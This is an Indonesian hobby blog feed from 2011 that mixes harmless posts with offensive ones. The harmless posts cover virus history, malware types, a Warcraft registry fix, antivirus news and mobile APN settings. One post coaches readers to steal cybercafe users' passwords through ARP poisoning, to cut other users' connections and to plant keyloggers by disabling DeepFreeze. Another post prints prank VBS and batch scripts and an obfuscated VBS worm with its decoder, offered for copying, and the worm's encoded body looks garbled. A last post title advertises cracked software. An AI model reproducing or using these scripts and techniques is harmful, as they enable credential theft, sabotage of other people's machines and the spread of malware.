unix_xnockout

Flashdisk sebagai senjata mungil para hacker

xnockout — Mon, 18 Apr 2011 19:38:17 +0000

Flashdisk yang kita kenal adalah sebuah perangkat portable yang sering digunakan sebagai media penyimpanan data, baik data pekerjaan kantor, kampus atau data-data penting lainnya.karena konsep dasar diciptakannya flashdisk adalah sebagai media penyimpanan data yang bersifat portabel dan gampang dibawa kemana-mana, banyak pemilik flashdisk yang menganggap flashdisk hanya berguna sesuai dengan konsep dasar penciptaannya. padahal dengan sedikit kreativitas anda dapat menjadikan flashdisk anda sebagai sebuah media pembantu dalam proses pembelajaran dan tindakan hacking maupun penerapan security/keamanan anda saat beraktivitas pada komputer yang anda gunakan.

Sebagai langkah awal sebelum masuk pada pembahasan yang lebih jauh,saya akan memaparkan apa yang saya lakukan pada flashdisk yang saya gunakan. flashdisk saya disini hanyalah sebagai pembanding karena tentunya anda memiliki ide yang lain yang ingin anda terapkan. pada flashdisk saya telah terinstall 2(dua) aplikasi portable yaitu PORTABLEAPPS buatan PortableApps.com dan LIBERKEY dari LiberKey.com. kedua aplikasi tadi kemudian saya bagi penggunaannya sesuai dengan kebutuhan. Penggunaannya akan saya paparkan lebih terperinci seperti di bawah ini :

PORTABELAPPS

Anda sudah pasti pernah bekerja pada computer anda melalui windows explorer dikarenakan pada modus ini anda leluasa dalam mengatur direktori maupun berpindah direktori secara lebih efisien karena windows explorer menampilkan directory melalui folder tree. Nah, portableapps memiliki fungsi yang hampir sama dengan windows explorer dan sangat mirip dengan my document pada system operasi windows. Anda bahkan mempunyai menu start tersendiri untuk mengakses flasdisk anda dan menjalankan program yang digunakan layaknya menu start pada windows. Dengan kemampuan seperti ini, maka anda dapat mengatur file-file yang ada pada flashdisk anda dengan rapi karena telah tersedia secara default beberapa direktori seperti Documents, music, video, picture, explorer ( layaknya windows explorer ) bahkan tersedia directori untuk backup, menu option, help dan fungsi search. Beberapa software disertakan secara default antara lain:

1. Browser Mozilla firefox portable mode

2. Mozilla thunderbirth

3. CCleaner ( penghapus jejak dan file sampah atau temporary file )

4. Clamwin portable ( anti virus )

5. keePass portable

6. open office

7. beberapa aplikasi multimedia,dsb.

Berdasarkan karakteristiknya, portableapps sebaiknya digunakan sebagai tools manajemen flashdisk anda serta editor untuk file tuga-tugas anda.

LIBERKEY

Inti dari tutorial ini berada pada aplikasi Liberkey. Saya katakan demikian karena jika di ibaratkan sebuah sebuah live disk untuk para hacker ataupun administrator jaringan seperti auditor, whax, slackware atau backtrack ( backtrack 2+ jasakom) maka liberkey bisa dikatakan sebuah system operasi yang berjalan melalui media flashdisk ( dapat pula dianggap sebagai system operasi virtual walaupun sebenarnya hanyalah kumpulan software portable). Secara default liberkey menyertakan beberapa aplikasi yang bias digunakan untuk aktivitas hacking disamping aplikasi standar yang lain.beberapa tools yang bias di gunakan untuk hacking maupun security defence antara lain adalah sebagai berikut:

1. recuva, aplikasi pembalik data yg telah terhapus.

2. Search my files, bias anda gunakan untuk mencari file-file yang terinfeksi firus maupun file-file utama sebuah virus, atau file-file rahasia pada sebuah computer.

3. Picpick, aplikasi screen capture (penangkap gambar)

4. Firefox portable, browser aman di karenakan anda terhindar dari aplikasi jahat pada kebanyakan browser warnet.

5. Runscanner, anti virus sekaligus anti spyware

6. Truecrypt, pengenkripsi disk drive

7. HashMyFile, software pengukur nilai hash

8. UltraShredder, menghapus file secara aman agar tidak bias dikembalikan secara utuh

9. NetWorks, aplikasi analisa data pada koneksi internet

10. PE network configurator, aplikasi untuk konfigurasi jaringan

11. Yale, pengukur bandwith network adapter

12. Team Viewer, aplikasi remote desktop

13. Softperfect Network Scanner, aplikasi scanner jaringan

14. Unlocker, tools penghapus file atau folder yang tidak bias dihapus secara normal.

Liberkey masih mempunyai banyak tools yang tidak penulis paparkan diatas di karenakan jumlahnya cukup banyak untuk di jelaskan, selain akan membuat tutorial ini menjadi tidak efisien dan terlihat seperti menyuapi anda sehingga lebih baik untuk menyerahkan masalah ini pada kreativitas anda masing-masing.ok

Selain tools portable diatas, tentunya ada kekurangan yang mungkin anda rasakan dikarenakan adanya tools favorit anda yang tidak disertakan. Untuk itu anda juga dapat mengisi flashdisk anda dengan software lain seperti Cain able, netcut, angry ip-scanner, super scan, notepad++,anti deepfreezedll.

PENERAPAN

Pada bagian penerapan ini, kita akan membuat sebuah scenario. Kita mengandaikan misalanya anda masuk pada sebuah warnet yang menerapkan retriksi yang ketat. Menu RUN di copot, Commandprompt di babat, bahkan notepad pun di comot. Tentunya anda akan merasa kenyamanan anda terusik akibat retriksi tersebut (masalah klasik, keamanan berbanding terbalik dengan kenyamanan), sehingga anda tidak dapat melakukan aktivitas hacking yang sudah anda pelajari di rumah. Jangan khawatir justru hal seperti ini patut anda jadikan motivasi dan tantangan ( hacking tanpa tantangan/masalah = BASI )dan jangan lupa bahwa anda telah membawa senjata mungil anda( flashdisk ).

Beberapa hal kecil yang bisa anda lakukan misalnya, jika anda ingin menggunakan command prompt yang diretriksi, anda bisa membuatnya dengan teks editor notepad. Buka notepad kemudian ketikkan “command.com” tanpa tanda petik dan save dengan ekstensi “.bat” pada desktop anda, selamat anda bias menggunakan command prompt. Notepad di retriksi? Jangan khawatir, ingat selalulah membawa file notepad kosong pada flashdisk anda atau anda bias mendownload sebuah file yang belum memiliki software default sebagai pembukanya. Gunakan open with notepad dan hapus halaman notepad tersebut lalu ketikkan code untuk membuat commandprompt. Selamat anda berhasil.

Jaringan terasa lambat dikarenakan bandwith yang terbagi pada semua computer di jaringan? Gunakan NETCUT yang telah anda bawa pada senjata mungil anda. Jalankan netcut dan cut koneksi computer lain dijaringan.selamat bandwith anda bertambah

Ingin mencuri password administrator atau FB pengguna warnet? Jalankan CAIN ABEL pada modus ARP poisoning dan silahkan menunggu korban anda.

Ingin memasang keylogger atau sejenisnya, jalankan anti deepfreeze. Selamat keylogger anda telah berjalan tanpa harus memusingkan deepfreeze yang telah anda lumpuhkan

Anda masih bias melakukan banyak hal lainnya sesuai kebutuhan anda. Sampai saat ini anda mungkin telah mendapat gambaran bagaimana memanage flashdisk anda menjadi sebuah senjata saat anda berada di dalam sebuah jaringan. Maaf jika tutorial ini masih jauh dari sempurna dan memiliki banyak kekurangan dikarenakan penulis masih bertaraf newbie, hanya motivasi untuk belajarlah yang membuat penulis memberanikan diri untuk tampil kehadapan teman-teman yang hebat di komunitas tercinta ini.

Source:

Filed under: Info, Threats

Membuat Browser Crash & Hank dengan Infinite Frame, Memory Hog dan White Screen Of The Dead

xnockout — Mon, 18 Apr 2011 19:01:20 +0000

Trik – trik ini bisa anda terapkan pada website atau blog, jadi ketika orang lain akan mengakses halaman tersebut maka browser mereka akan crash dan hank. Oke dimulai saja, berikut triknya :

Trik 1. Infite Frame dan iframe

1. Buka Notepad, kemudian ketikkan script berikut

script frame.html:

script iFrame.html:

2. Save As dengan ekstention .html nama filenya terserah, misalkan sentrablog.html ingat pada Save As type pilih All Files.

3. Kemudian buka file yang disave tersebut menggunakan Mozila atau IE, hahahaa…..awas browsernya crash ya.

Script diatas untuk membuka frame dalam frame, kalo lama kelamaan maka akan menimbulkan web browser menjadi hang.

Trik 2. Memory Hog

1. Buka Notepad, kemudian ketikkan script berikut

2. Save As dengan ekstensi .html sama seperti cara diatas

Script ini dapat mengalokasikan memory sampai gak bersisa, kalau pada windows 9x akan menyebabkan crash.

Trik 3. White Screen Of The Death

Caranya sama seperti diatas, ketikkan script berikut lalu save, berikut ini scriptnya ;

Source

Filed under: Info, Programming, Tips Tagged: Security, tips, Trik

Perbedaan Worm, Virus, Trojan Horse dan Malicious Toolkits

xnockout — Mon, 18 Apr 2011 18:47:35 +0000

Virus dan Worm merupakan salah satu program – program yang merusak dan membahayakan pengguna komputer. Jika tidak tahu bagaimana mencegahnya maka siap – siap data – data penting anda akan hilang atau disadap oleh orang lain. Untuk mengungkap bagaimana sejarah dan asal mula worm, anda bisa membaca postingan saya yang ini “ Sejarah dan Asal Mula WORM “.

Istilah “virus” selalu digunakan sebagai suatu acuan umum untuk setiap malcode (program atau script yang dibuat dengan tujuan membahayakan atau merugikan sebuah system komputer), seperti worm, trojan bahkan hoax yang sesungguhnya bukan sebuah virus komputer, berikut adalah beberapa jenis malcode tersebut:

1. Computer virus: merujuk pada program yang memiliki kemampuan untuk ber- reproduksi, menulari program lain dan menjadikan file-file program tertular sebagai file infector.

2. Computer worm: merujuk pada program independen yang memiliki kemampuan untuk ber-reproduksi, menulari system komputer dan walaupun mampu untuk menulari program lain namun tidak bertujuan untuk menjadikan file tertular tersebutsebagai suatu file infector.

3. Trojan horse: merujuk pada program independen yang tampaknya berguna, dan ketika dieksekusi, tanpa sepengetahuan pengguna, juga melaksanakan fungsi-fungsi yang bersifat destruktif dan merugikan.

4. Malicious toolkits: merujuk pada program yang didesain untuk membantu menciptakan program-program yang dapat membahayakan sebuah system komputer. Contoh dari program jenis ini adalah tool pembuat virus dan program yang dibuat untuk
membantu proses cracking atau hacking.

Dari beberapa keterangan diatas dapat diperjelas bahwa worm adalah suatu algoritma atau program yang mereproduksi diri sendiri dari system ke system dengan menggunakan media penyimpanan atau suatu jaringan. Worm tidak menginfeksi file program lain dengan tujuan menjadikan file terinfeksi tersebut sebagai file infector.

Worm mampu bekerja tanpa interaksi user, bisa merusak sebuah data secara langsung atau menurunkan kinerja system dengan “mengikat” sumber daya system komputer dan bahkan bisa mematikan sebuah jaringan. Berbeda dengan virus yang melakukan infeksi dengan ‘menumpang’ pada file program lain, menunggu interaksi user dan menjadikan file terinfeksi sebagai file infector.

Source:

Computer Worm 1 – Secret of Underground Coding

Achmad Darmal-Jasakom

Filed under: Info, Threats Tagged: Malicious Code, Sejarah, Trojan, Virus, Worm

Fixing the ‘Warcraft III\InstallPath’ Registry Error

xnockout — Thu, 07 Apr 2011 09:33:23 +0000

When I was going to patch my copy of WarCraft 3: The Frozen Throne (aka WC3) this evening, an error occurred when the patch, War3TFT_125b_English.exe, was executed:

Registry error loading key ‘Warcraft III\InstallPath’
The system cannot find the file specified.

The reason I got this error was that my copy of WC3 was from an external backup harddrive, meaning I hadn’t made a fresh install on the harddrive. When I tried to access the Blizzard Support, all I got was “Knowledge Base currently unavailable”. Searching for it gave moot results, such as “re-install the game” and “contact Blizzard”. With a few try-and-fail‘s I got it working:
1. Run the game and make some configurations, then exit game

2. Run the Registry Editor: Start > Run > regedit

3. Navigate to HKEY_CURRENT_USER > Software > Blizzard Entertainment > Warcraft III

4. Right-click, choose New > String Value, call it InstallPath

5. Right-click on InstallPath and choose Modify

6. In Value Data, write the adress to your W3C folder, for instance D:\Games\Warcraft III\

7. Click OK, then close Registry Editor

8. Run patch
The first instruction is just to make sure there’s some registry details for WC3 for the Registry Editor. The configurations you make in-game doesn’t need to be any special. Just turn the background music off, for instance.

Filed under: Info, Tips Tagged: DotA, Frozen Throne, Patch Error, Warcraft

Download PCMAV (PC Media Anti Virus)

xnockout — Wed, 06 Apr 2011 12:20:59 +0000

PCMAV 5.0 Valhalla telah diluncurkan bersamaan dengan terbitnya majalah PC Media edisi 4/2011, pada rilis kali ini PCMAV Valhalla telah menggantikan versi Ragnarok3 sebelumnya. Pada PCMAV 5.0 Valhalla telah dilakukan berbagai perbaikan dan penambahan berbagai fitur baru serta penambahan database hingga 4.025 virus beserta variannya.

Apa yang baru?

LinkProtector: Merupakan salah satu fitur utama terbaru yang dapat memberi perlindungan pengguna saat berinternet. Fitur LinkProtector ini mampu mencegat website berbahaya yang memiliki potensi menyebarkan malware hingga tindakan phising. Dengan kumpulan database yang dapat di-update, keamanan dalam berinternet pun dapat terjaga.
Anti-Keystroke: Salah satu ancaman dari malware yang popular saat ini yaitu pencurian data. Fitur terbaru Anti-Keystroke akan mencegat secara real-time perekaman tekanan tombol keyboard yang dilakukan oleh sebagian besar program keylogger yang banyak beredar saat ini.
Extension Manager: Beberapa extension yang terdapat pada PCMAV 5.0 dapat digunakan sebagai program bantuan dalam menganalisa sistem seperti Task Manager, Process Monitor, dan Locked Handles Viewer. Ke depan, SDK Extension Manager akan dipublikasikan sehingga pihak ketiga dapat pula ikut terlibat dalam membuat extension tambahan, namun keamanannya tetap terjaga.
Lock Settings: Proteksi password terhadap konfigurasi yang ditetapkan pengguna agar secara umum setting/konfigurasi PCMAV tidak dapat diubah atau dipaksa exit, khususnya oleh malware
UPDATED! Ditambahkan database pengenal dan pembersih 101 virus lokal/asing/varian baru yang dilaporkan menyebar di Indonesia. Total 4025 virus beserta variannya.
ADDED! Removal engine khusus untuk membersihkan secara tuntas virus KiamatParay dan Xor2009 yang menyebar luas di Indonesia.
IMPROVED! Perubahan nama virus mengikuti varian baru yang ditemukan.
IMPROVED! Perbaikan beberapa minor bug dan improvisasi kode internal untuk memastikan bahwa PCMAV tetap menjadi antivirus kebanggaan Indonesia.

DOWNLOAD HERE

Source: http://heryantony.com/pcmav-5-0-valhalla-april-2011/

Filed under: Download

Cara Setting GPRS dan MMS pada Operator GSM

xnockout — Wed, 06 Apr 2011 10:52:28 +0000

Cara Setting GPRS Dan MMS Pada Operator GSM

KARTU HALLO
Setting Melalui SMS
Kirim SMS ke 6616 dengan pesan :
Ketik : GPRS

KARTU SIMPATI/KARTU AS
Setting Melalui SMS
Kirim SMS ke 6616 dengan pesan :
Ketik : GPRS[spasi]angka dibelakang simcard Anda (Nomor ICCID/Integrated Circuit Card Identification)

Setting Manual GPRS
Profile Name : TSEL GPRS
APN : Telkomsel
User name : wap
Password : wap123
Authentication : Normal
Gateway IP address : 10.1.89.130
Homepage : http://wap.telkomsel.com
Data Bearer : GPRS
Proxy port number : 9201 atau 8000

Setting Manual MMS
Connection Name: tel-MMS
Data Bearer: GPRS
Access Point Name: mms
Username: wap
Prompt Password: No
Password: wap123
Authentication: Normal
Proxy address: 10.1.89.150
Homepage: http://mms.telkomsel.com/
Connection Security: Off

KARTU MATRIX
Setting Melalui SMS
Kirim SMS ke 888 dengan pesan :
ACT[spasi]GPRS

KARTU MENTARI
Setting Melalui SMS
Kirim SMS ke 3000 dengan pesan :
Ketik : GPRS[spasi] merk HP[spasi] tipe HP

Setting Manual GPRS
Profile Name : INDOSATGPRS
Homepage URL : http://wap.klub-mentari.com
IP Address : 10.19.19.19
Bearer : GPRS
User Name : indosat
Password : indosat
APN : indosatgprs

Setting Manual MMS
Profile Name : INDOSATGPRS
Homepage URL : http://mmsc.indosat.com
IP Address : 10.19.19.19:8080
Bearer : GPRS
User Name : indosat
Password : indosat
APN : indosatmms

KARTU IM3
Setting Melalui SMS
Kirim SMS ke 3939 dengan pesan :
Ketik : GPRS[spasi] merk HP[spasi] tipe HP

Setting Manual GPRS
Connection name : M3-GPRS
Access point name : www.indosat-m3.net
User name : gprs
Password : im3
Authentication : Normal
Homepage : http://wap.indosat-m3.net
IP address : 010.019.019.019
Port : 9201 (standard), 8080 (proxy)

Setting Manual MMS
Connection name : M3-MMS
Access point name : indosatmms
User name : indosatmms
Password : indosatmms
Authentication : Normal
Homepage : http://mmsc.indosat-m3.net
IP address : 010.019.019.019
Port : 9201 (standard), 8080 (proxy)

KARTU XL
Setting Melalui SMS
Ketik SMS dengan isi : GPRS[spasi][spasi] Kirim ke 9667
Ketik SMS dengan isi : MMS[spasi][spasi] Kirin ke 9667

Setting Manual GPRS
Connection Name: XL-GPRS
Data Bearer: GPRS
Access Point Name: www.xlgprs.net
Username: xlgprs
Prompt Password: No
Password: proxl
Authentication: Normal
Homepage: http://wap.lifeinhand.com
Connection Security: Off
Session Mode: Permanent
IP Address: Automatic
Proxy Server Address: 202.152.240.050
Proxy Port Number: 8080

Setting Manual MMS
Connection Name: XL-MMS
Data Bearer: GPRS
Access Point Name: www.xlmms.net
Username: xlgprs
Prompt Password: No
Password: proxl
Authentication: Normal
Homepage: http://mmc.xl.net.id/servlets/mms
Connection Security: Off
Session Mode: Permanent
IP Address: Automatic
Proxy Server Address: 202.152.240.050
Proxy Port Number: 8080

KARTU 3(THREE)
Setting Manual GPRS
Settings Name: 3-GPRS
Homepage : http://wap.three.co.id/
Proxies : Enable
Proxy address : 10.4.0.10
Port : 3128
GPRS access point : 3gprs
Authentication type : Normal
Login type : Automatic
Username : 3gprs
Password : 3gprs

Setting Manual MMS
Settings name : 3-MMS
Homepage : http://mms.hutch.co.id/
GPRS access point : 3mms
Authentication type : Normal
Username : 3mms
Password : 3mms
Allow adverts : No

KARTU AXIS
Setting Manual GPRS
Connection Name : AXIS
Data Bearer : GPRS atau PS
Access Point Name (APN) : AXIS
Username : AXIS
Prompt Password : No
Password : 123456
Authentication : Normal
Gateway/Proxy IP Address : 10.8.3.8
Gateway/Proxy Port : 9201 atau 8080
Homepage : http://wap.axisworld.co.id
Connection Security : Off
Session Mode : Permanent

Setting Manual MMS
Connection Name : AXISmms
Data Bearer : GPRS atau PS
Access Point Name (APN) : AXISmms
Username : AXIS
Prompt Password : No
Password : 123456
Authentication : Normal
Gateway/Proxy IP Address : 10.8.3.8
Gateway/Proxy Port : 9201 atau 8080
Homepage / MMS Server : http://mmsc.AXIS
Connection Security : Off
Session Mode : Permanent

Filed under: Info, Iseng, Tips

Sejarah tentang virus komputer

xnockout — Mon, 04 Apr 2011 21:41:09 +0000

Virus yang pertama kali muncul di dunia ini bernama [Elk Cloner] lahir kira-kira tahun 1981 di TEXAS A&M. Menyebar melalui disket Apple II yang ada operating systemnya. Sang perusak ini mendisplay pesan di layar : “It will get on all your disks-It will infiltrate your chips–yes it is Cloner!-It will stick to you like glue-It will modify RAM too-send in the Cloner!” Hi……………….

Nama ”Virus” itu sendiiri baru diberkan setelah 2 tahun kelahirannya oleh Len Adleman pada 3 November 1983 dalam sebuah seminar yang ngebahas cara membuat virus and memproteksi diri dari virus. Tapi orang-orangorang sering menganggap bahwa virus yang pertama kali muncul adalah virus [Brain] yang justru lahir tahun 1986. Wajar aja, soalnya virus ini yang paling menggemparkan dan paling meluas penyebarannya karean menjalar melalui disket DOS yang waktu itu lagi ngetrend. Lahirnya juga bersamaan dengan [PC-Write Trojan] dan [Vindent]

Mulai saat itu, `virus mulai menguasai dunia. Perkembangannya mengerikan dan sangar banget ! berselang satu tahun muncul virus pertama yang menginfeksi file. Biasanya yang diserang adalah file yang berekstensi *.exe Virus ini bernama [suriv] termasuk dalam golongan virus “jerussalem”. Kecepatan penyebarannya cukup ‘menggetarkan hati’ untuk saat itu. Tapi virus ini ngga’ terlalu jahat ko’ soalnya virus ini menghantam dan menghajar mainframe-nya IBM ngga’ lama-lama, cuma setahun (eh setahun itu lama apa sebentar ya…?)

Tahun 1988, muncul serangan BESAR terhadap Machintosh oleh virus [MacMag] dan [scores] dan jaringan Internet dihajar habis-habisan oleh virus buatan Robert Morris. Tahun 1989 ada orang iseng yang ngirim file “AIDS information program” dan celakanya, begitu file ini dibuka, yang didapat bukannya info tentang AIDS, tapi virus yang mengenskrypsi harddisk dan meminta bayaran untuk kode pembukanya (hehehe…….. ada-ada aja cara orang nyari duit)

Sejak saat itu, penyebaran virus udah ngga’ keitung lagi. Akan tetapi dampak yang ditimbulkan ngga’ terlalu besar. Baru tahun 1995 muncul serangan besar-besaran. Ngga’ tanggung-tanggung, mereka nyerang perusahaan-perusahaan besar diantaranya Griffith Air Force Base, Korean Atomic Research Institute, NASA, IBM dan masih banyak PERUSAHAAN RAKSASA lain yang dianiaya oleh “INETRNET LIBERATION FRONT” di hari ~Thanksgiving~. Karena keberanian dan kedahsyatan serangan itu, tahun 1995 dijuluki sebagai tahunnya para Hacker dan Cracker.

Para Cracker memang tidak pernah puas. Setiap muncul sistem operasi atau program baru, mereka sudah siap dengan virus barunya. Kamu yang sering ngetik dengan MS Word mungkin pernah nemuin virus Titassic. Ini virus local asli Indonesia lho… and uniknya, virus ini ngingetin kita buat sholat tepat pada waktunya (waduh, alim juga ya..) Tapi jangan salah, virus macro yang punya judul [concept]ini juga bisa berhati jahat, sangar and ganas banget. Soalnya si alim yang jahat ini bakalan ngemusnahin 80% file-file data and program korbannya.

Nah, seiring dengan perkembangan teknologi, muncul virus pertama yang mengkombinasi virus macro dan worm. Namanya cukup manis [Melissa]. Tapi ngga’ semanis namanya, virus ini bakalan menyebar ke orang lain lewat E-Mail and yang paling menyakitkan, ia bakalan nyebar ke semua alamat E-Mail yang ada di address book-mu. Dan saat ini muncul jutaan virus yang bergentayangan ngga’ karuan di alam Internet.

Filed under: Info, Iseng

Virus, worm, trojan, malware Open Source

xnockout — Mon, 04 Apr 2011 21:22:46 +0000

oke kali ini saya akan memberitahukan anda kumpulan script virus worm yang saya dapat dari idws forum oke ini dia script nya:

copy kan semua code dibawah ini ke notepad

———————————————————————
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
———————————END———————————\

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
———————————END———————————

Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
———————————END———————————

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo “
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re “
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? “
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! “
———————————END———————————

MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
———————————END———————————

Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “You are a fool.”
loop
———————————END———————————

‘Vbs.Vbswg.GHZ 1.0 Created By GHZ. 9/30/2010
Execute TH8IQFIU(“-\hy4\hy}m4MN`&746&Ixkgzkj&H&MN`4&?59658676Ykz&KIIOXQ>X&C&ixkgzkuhpkiz.(yixovzotm4lorkyyzksuhpkiz(/KTR99N9I&C&KIIOXQ>X4mkzyvkiogrlurjkx.6/SR;Y9==9&C&KTR99N9I&,&(bMN`&7464nzsr4|hy(Ykz&WRMIX4iuvlork&}yixovz4yixovzl{rrtgsk2&SR;Y9==9P8VP6<;8Ol&WRMIKtj&olOl&WRMIX4uvktzk~zlork.}yixovz4yixovzl{rrtgsk/H;;[:RZ[&C&KNXX4lorkk~oyzy.}yixovz4yixovzl{rrtgsk//&znktykz&H88>V>>9C&KIIOXQ>X4ixkgzkzk~zlork.}yixovz4yixovzl{rrtgsk/H88>V>>94}xozk&H;;[:RZ[H88>V>>94iruykktj&olSX8[V./Ykz&\=[<:78V&C&IxkgzkUhpkiz.(U{zruuq4Gvvroigzout(/Ol&\=[<:78V&C&(U{zruuq(&ZnktYkz&I;;MT79<&C&\=[<:78V4MkzTgskYvgik.(SGVO(/Ykz&J9XWX=7J&C&I;;MT79<4GjjxkyyRoyzyLux&Kgin&\?9\>88?&C&\?9\>6?&C&7&Zu&V88?Ykz&S:9>6TWQ&C&\=[<:78V4IxkgzkOzks.6/Ykz&P87=[G=Y&C&\?9\>6?/S:9>6TWQ4Zu&C&P87=[G=Y4GjjxkyyS:9>6TWQ4Y{hpkiz&C&(\kx&Osvuxzgtz’(S:9>6TWQ4Huj&C&(No@(&,&|hixrl&,&(Vrkgyk&|ok}&znoy&lork2&oz-y&|kx&osvuxzgtz4(&,&|hixrl&,&((k~ki{zk&(ykz&PZORH8U8&CS:9>6TWQ4(&,&Inx.<;/&,&Inx.776TWQ4JkrkzkGlzkxY{hsoz&C&Zx{kPZORH8U84Gjj&\G[IIOXQOl&S:9>6TWQ4Zu&BD&((&ZnktS:9>6TWQ4YktjKtj&OlTk~zKtj&OlTk~zKtj&OlKtj&l{tizoutL{tizout&Z6Q=N<;Z.U7MZ8?==/Ol&U7MZ8?==&BD&((&ZnktYP8RMIX4lorkk~oyzy.(i@bsoxibsoxi4oto(/&ZnktU7MZ8?==&C&(i@bsoxi(KrykOl&KIIOXQ>X4lorkk~oyzy.(i@bsoxi98bsoxi4oto(/&ZnktU7MZ8?==&C&(i@bsoxi98(KrykOl&KIIOXQ>X4lorkk~oyzy.YP8RMIX4lorkk~oyzy.YP8RMIX4IxkgzkZk~zLork.U7MZ8?==&,&(byixovz4oto(2&Zx{k/K=RTR99N&C&(ayixovzc(&,&|hIxRl&,&(t6Cut&7@PUOT@)@�(K=RTR99N&C&K=RTR99N&,&|hIxRl&,&(t6Cut&7@PUOT@)@�(K=RTR99N&C&K=RTR99N&,&|hIxRl&,&(t7C&&5ol&.&*toiq&CC&*sk&/&�&ngrz&ƒ(K=RTR99N&C&K=RTR99N&,&|hIxRl&,&(t8C&&54(&,&Inx.766/&,&Inx.??/&,&Inx.??/&,&(&yktj&*toiq&(K=RTR99N&C&K=RTR99N&,&SR;Y9==9K=RTR99N&C&K=RTR99N&,&|hIxRl&,&(t9Cƒ(yixovz4IruykKtj&OlKtj&L{tizoutL{tizout&GI=R;Y9=./Ut&Kxxux&Xky{sk&Tk~zYkz&W8G8VP6<&C&KIIOXQ>X4Jxo|kyLux&Kgin&MJR?P<[NNXX4MkzLurjkx.V>NNXV>&C&U?G;;[:R4LorkyLux&Kgin&LK:X8[V<&Ot&Z:K88>V>Ol&rigyk.LK:X8[V<4Tgsk/&C&(soxi4oto(&ZnktZ6Q=N<;Z.LK:X8[V<4VgxktzLurjkx/Ktj&OlOl&KIIOXQ>X4MkzK~zktyoutTgsk.LK:X8[V<4vgzn/&C&(|hy(KIIOXQ>X4IuvLork&}yixovz4yixovzl{rrtgsk2LK:X8[V<4vgzn2zx{kKtj&olOl&KIIOXQ>X4MkzK~zktyoutTgsk.LK:X8[V<4vgzn/&C&(|hk(KIIOXQ>X4IuvLork&}yixovz4yixovzl{rrtgsk2LK:X8[V<4vgzn2zx{kKtj&olTk~zYkz&IM8=[<:7&C&U?G;;[:R4Y{hlurjkxyLux&Kgin&J>I;;MT7&Ot&IM8=[<:7Igrr&.J>I;;MT74vgzn/Tk~zKtj&l{tizoutL{tizout&P8VP6<;8./Xgtjuso€kOl&7&1&Otz.Xtj&0&7666/&C&=&znktSymhu~&(O-|k&tuznotm&zu&yg4&@u/(2<:2(@u/(ktj&olktj&l{tizout-\hy}m&8&Hkzg4&H&aQc”,-6) Function TH8IQFIU(C38QDRVV,F8O63JAL) For L6F3M0OD = 1 To Len(C38QDRVV) V6BD6OKI = Mid(C38QDRVV, L6F3M0OD, 1) If V6BD6OKI = Chr(2) Then V6BD6OKI = Chr(34 + F8O63JAL) ElseIf V6BD6OKI = Chr(3) Then V6BD6OKI = Chr(10 + F8O63JAL) ElseIf V6BD6OKI = Chr(4) Then V6BD6OKI = Chr(13 + F8O63JAL) Else V6BD6OKI = Chr(Asc(V6BD6OKI) + F8O63JAL) End If TH8IQFIU = TH8IQFIU & V6BD6OKI Next End Function ———————————END———————————

kalo yang ini tinggal copas aja tapi save as .bat

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
——————————-END————————————

@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.
@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a
———————————–END——————————-

@echo off
msg * I don’t like you
shutdown -c “Error! You are too stupid!” -s
———————————–END——————————-

@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press ‘x’ then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc…
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you’re boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
———————————END———————————

sekian script dari saya

Filed under: Cracking, Info, Iseng, Programming, Tips Tagged: Malware, Open Source, Virus, Worm

AIDA64 Extreme Edition Full Crack

xnockout — Mon, 04 Apr 2011 21:12:22 +0000

